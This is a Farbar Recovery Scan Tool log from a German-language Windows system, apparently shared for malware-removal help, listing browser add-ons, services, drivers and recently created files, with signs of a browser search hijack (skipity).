BHO-x32: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
BHO-x32: No Name - {5C255C8A-E604-49b4-9D64-90988571CECB} -  No File
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
Toolbar: HKLM - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKCU - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{A8B01E69-7297-4C38-B3E3-40775DDD3E9E}: [NameServer]213.94.78.17 213.94.78.16

FireFox:
========
FF ProfilePath: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default
FF user.js: detected! => C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\user.js
FF Homepage: hxxp://www.starobserver.org|hxxp://news.astronomie.info/
FF Keyword.URL: hxxp://search.skipity.com/?source=ab&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @Google.com/GoogleEarthPlugin - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @t-immersion.com/DFusionHomeWebPlugIn - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.1 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\s-amazon.xml
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\skipity-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\googledesktop.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\yahoo-de.xml
FF Extension: German Dictionary - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\de-DE@dictionaries.addons.mozilla.org [2012-10-14]
FF Extension: Print pages to PDF - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\printPages2Pdf@reinhold.ripper [2013-11-12]
FF Extension: WOT - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{a0d7ccb3-214d-498b-b4aa-0e8fda9a7bf7} [2013-11-28]
FF Extension: Firebug - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\firebug@software.joehewitt.com.xpi [2013-09-23]
FF Extension: Write Area - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\writearea@writearea.com.xpi [2012-10-22]
FF Extension: Web Developer - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{c45c406e-ab73-11d8-be73-000a95be3b12}.xpi [2012-08-15]
FF Extension: Adblock Plus - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-10-19]
FF Extension: Anti-Banner - C:\Program Files (x86)\Mozilla Firefox\extensions\KavAntiBanner@kaspersky.ru_bak [2013-12-12]
FF Extension: Modul zur Link-Untersuchung - C:\Program Files (x86)\Mozilla Firefox\extensions\linkfilter@kaspersky.ru_bak [2013-12-12]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2013-12-12]
FF HKLM-x32\...\Firefox\Extensions: [virtualKeyboard@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\virtualKeyboard@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [KavAntiBanner@Kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\KavAntiBanner@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [linkfilter@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\linkfilter@kaspersky.ru

Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\pdf.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (2007 Microsoft Office system) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (Java(TM) Platform SE 7 U17) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll No File
CHR Plugin: (Microsoft Office Live Plug-in for Firefox) - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
CHR Plugin: (NVIDIA 3D Vision) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
CHR Plugin: (NVIDIA 3D VISION) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
CHR Plugin: (D'Fusion @Home Web Plug-In (3.20.20164)) - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
CHR Plugin: (VLC Web Plugin) - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live\u00AE Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_169.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.170.2) - C:\Windows\SysWOW64\npDeployJava1.dll No File
CHR Extension: (Google Docs) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0 [2013-10-11]
CHR Extension: (Google Drive) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0 [2013-10-11]
CHR Extension: (YouTube) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0 [2013-10-11]
CHR Extension: (Google Search) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0 [2013-10-11]
CHR Extension: (Chrome In-App Payments service) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.11_0 [2013-10-11]
CHR Extension: (Gmail) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0 [2013-04-19]

==================== Services (Whitelisted) =================

S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2010-12-18] (Adobe Systems)
R2 Adobe Version Cue CS2; C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe [163840 2005-04-06] (Adobe Systems Incorporated)
R2 arXfrSvc; C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe [231280 2011-01-10] (Microsoft Corporation)
R2 avmike; C:\Program Files\FRITZ!Fernzugang\avmike.exe [335224 2010-03-30] (AVM Berlin)
R2 certsrv; C:\Program Files\FRITZ!Fernzugang\certsrv.exe [143224 2010-03-30] (AVM Berlin)
R2 dgdersvc; C:\Windows\SysWOW64\dgdersvc.exe [95568 2010-05-13] (Devguru Co., Ltd.)
R2 esClient; C:\Program Files\Windows Home Server\esClient.exe [109936 2011-01-10] (Microsoft Corporation)
R2 FirebirdGuardianHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe [1265664 2011-01-17] ()
R3 FirebirdServerHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe [3735552 2011-01-17] (Firebird Project)
S3 FirebirdServerMAGIXInstance; C:\Program Files (x86)\MAGIX\Common\Database\bin\fbserver.exe [1527900 2005-11-17] (MAGIX®)
S3 GoogleDesktopManager-051210-111108; C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
R2 HauppaugeTVServer; C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe [577024 2012-03-24] (Hauppauge Computer Works)
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [346976 2011-03-14] ()
S3 KiesAllShare; C:\Program Files (x86)\Samsung\Kies\WiselinkPro\WiselinkPro.exe [9241088 2010-05-13] ()
S3 Macromedia Licensing Service; C:\Program Files (x86)\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe [68096 2010-12-19] ()
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-10-23] (Microsoft Corporation)
R2 MWLService; C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\\MWLService.exe [305448 2009-09-10] (Egis Technology Inc.)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [348376 2013-10-23] (Microsoft Corporation)
R2 nwtsrv; C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe [189304 2010-03-30] (AVM Berlin)
R2 TryAndDecideService; C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe [498872 2007-08-31] ()
R2 USBS3S4Detection; C:\OEM\USBDECTION\USBS3S4Detection.exe [76320 2009-12-09] ()
R2 WHSConnector; C:\Program Files\Windows Home Server\WHSConnector.exe [489840 2011-01-10] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 dgderdrv; C:\Windows\System32\drivers\dgderdrv.sys [20568 2010-05-13] (Devguru Co., Ltd)
R3 dgderdrv; C:\Windows\SysWOW64\drivers\dgderdrv.sys [18136 2010-05-13] (Devguru Co., Ltd)
S3 hcw17bda; C:\Windows\System32\drivers\hcw17bda.sys [67456 2010-01-27] (Hauppauge Computer Works, Inc.)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [242688 2012-12-22] (Huawei Technologies Co., Ltd.)
S4 Iaaidassi; No ImagePath
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [248240 2013-09-27] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [134944 2013-09-27] (Microsoft Corporation)
R3 NWIM; C:\Windows\System32\DRIVERS\avmnwim.sys [412024 2010-03-30] (AVM Berlin)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-08-06] ()
R1 UimBus; C:\Windows\System32\DRIVERS\uimx64.sys [59184 2011-11-17] (Windows (R) 2000 DDK provider)
R1 Uim_IM; C:\Windows\System32\Drivers\Uim_IMx64.sys [572336 2011-11-17] (Paragon)
R1 Uim_VIM; C:\Windows\System32\Drivers\uim_vimx64.sys [352816 2011-11-17] (Paragon)
U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [117248 2010-07-27] (Huawei Technologies Co., Ltd.)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:43 - 2014-01-15 08:44 - 02076160 _____ (Farbar) C:\Users\*****\Downloads\FRST64.exe
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 08:41 - 2014-01-15 08:41 - 00050477 _____ C:\Users\*****\Downloads\Defogger.exe
2014-01-14 18:44 - 2014-01-14 18:44 - 00002952 _____ C:\Users\*****\Downloads\access_log_2013-11-12.gz
2014-01-14 18:42 - 2014-01-14 18:42 - 00002316 _____ C:\Users\*****\Downloads\access_log_2014-01-05.gz
2014-01-14 18:40 - 2014-01-14 18:50 - 121822819 _____ C:\Users\*****\Downloads\avg_arl_ffi_all_120_130801a6481.rar
2014-01-14 18:28 - 2014-01-14 18:35 - 112001024 _____ C:\Users\*****\Downloads\avg_arl_cdi_all_120_130801a6481.iso
2014-01-14 18:26 - 2014-01-14 18:54 - 625348608 _____ C:\Users\*****\Downloads\rescue-system.iso
2014-01-14 18:15 - 2014-01-14 18:38 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-14 18:09 - 2014-01-14 18:09 - 05063616 _____ (PortableApps.com) C:\Users\*****\Downloads\FileZillaPortable_3.7.3.paf.exe
2014-01-14 15:11 - 2014-01-14 15:11 - 00378099 _____ C:\Users\*****\Downloads\10_246_16_68.sql
2014-01-14 11:03 - 2014-01-14 11:04 - 00000000 ____D C:\Users\*****\Desktop\templates_c
2014-01-13 16:31 - 2014-01-13 16:31 - 01790152 _____ C:\Users\*****\Downloads\com_phocagallery_v3.2.6(1).zip
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-12 10:56 - 2014-01-12 10:56 - 00028736 _____ C:\Users\*****\Downloads\12_01_2014_WebFTP.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00119546 _____ C:\Users\*****\Downloads\droid-serif.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00079700 _____ C:\Users\*****\Downloads\droid-sans-mono.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00011194 _____ C:\Users\*****\Downloads\Droid.zip
2014-01-12 09:19 - 2014-01-12 09:19 - 00211015 _____ C:\Users\*****\Downloads\Droid-Sans.zip
2014-01-11 20:32 - 2014-01-11 20:33 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-10 10:58 - 2014-01-10 10:58 - 00036115 _____ C:\Users\*****\Downloads\access-2014010821-2014011002.log.gz
2014-01-09 11:59 - 2014-01-09 12:03 - 126234924 _____ C:\Users\*****\Downloads\Vorübung zu Swan Dive Prep.wmv
2014-01-08 11:52 - 2014-01-08 11:52 - 00002371 _____ C:\Users\*****\Downloads\address.zip
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2004-03-09 00:00 - 00662288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSCOMCT2.OCX
2014-01-08 11:15 - 1998-07-06 00:00 - 00023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPIDE.DLL
2014-01-08 11:15 - 1998-06-24 00:00 - 00137000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMAPI32.OCX
2014-01-08 11:13 - 2014-01-08 11:15 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-30 20:11 - 2013-12-30 20:16 - 176752984 _____ (VMware, Inc.                                                   ) C:\Users\*****\Downloads\VMware-converter-en-5.5.0-1362012.exe
2013-12-30 08:54 - 2013-12-30 08:58 - 98508144 _____ (VMware, Inc.) C:\Users\*****\Downloads\VMware-player-6.0.1-1379776.exe
2013-12-30 08:35 - 2013-12-30 08:35 - 00409141 _____ C:\Users\*****\Downloads\torbutton146-current.zip
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-29 11:22 - 2013-12-29 11:24 - 81699167 _____ (Stellarium team                                             ) C:\Users\*****\Downloads\stellarium-0.12.4-win64.exe
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:56 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-28 11:55 - 2013-06-06 13:00 - 03748792 ____N (mquadr.at software engineering und consulting GmbH) C:\Windows\SysWOW64\M2ElevatedCalls.dll
2013-12-28 11:55 - 2012-12-22 09:46 - 00014976 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbenumfilter.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00242688 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juwwanecm.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00076800 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcecm.sys
2013-12-28 11:55 - 2012-12-03 18:40 - 00452608 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbwwan.sys
2013-12-28 11:55 - 2012-12-03 14:57 - 00238592 ____N (Nicomsoft Ltd.) C:\Windows\SysWOW64\WiFiMan.dll
2013-12-28 11:55 - 2012-08-20 08:55 - 00104960 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcacm.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00090112 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jubusenum.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00030720 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juextctrl.sys
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2011-12-31 09:20 - 00225920 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys
2013-12-28 11:55 - 2010-10-08 16:59 - 00032768 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys
2013-12-28 11:55 - 2010-09-26 18:09 - 00022016 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwupgrade.sys
2013-12-28 11:55 - 2010-08-06 07:43 - 01001472 _____ (DiBcom SA) C:\Windows\system32\Drivers\mod7700.sys
2013-12-28 11:55 - 2010-07-27 09:52 - 00117248 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwusbdev.sys
2013-12-28 11:53 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\DatacardService
2013-12-23 08:35 - 2013-12-23 08:36 - 14335560 _____ C:\Users\*****\Downloads\flags.zip
2013-12-17 12:17 - 2013-12-17 12:21 - 103312806 _____ C:\Users\*****\Downloads\d012f60a.sql
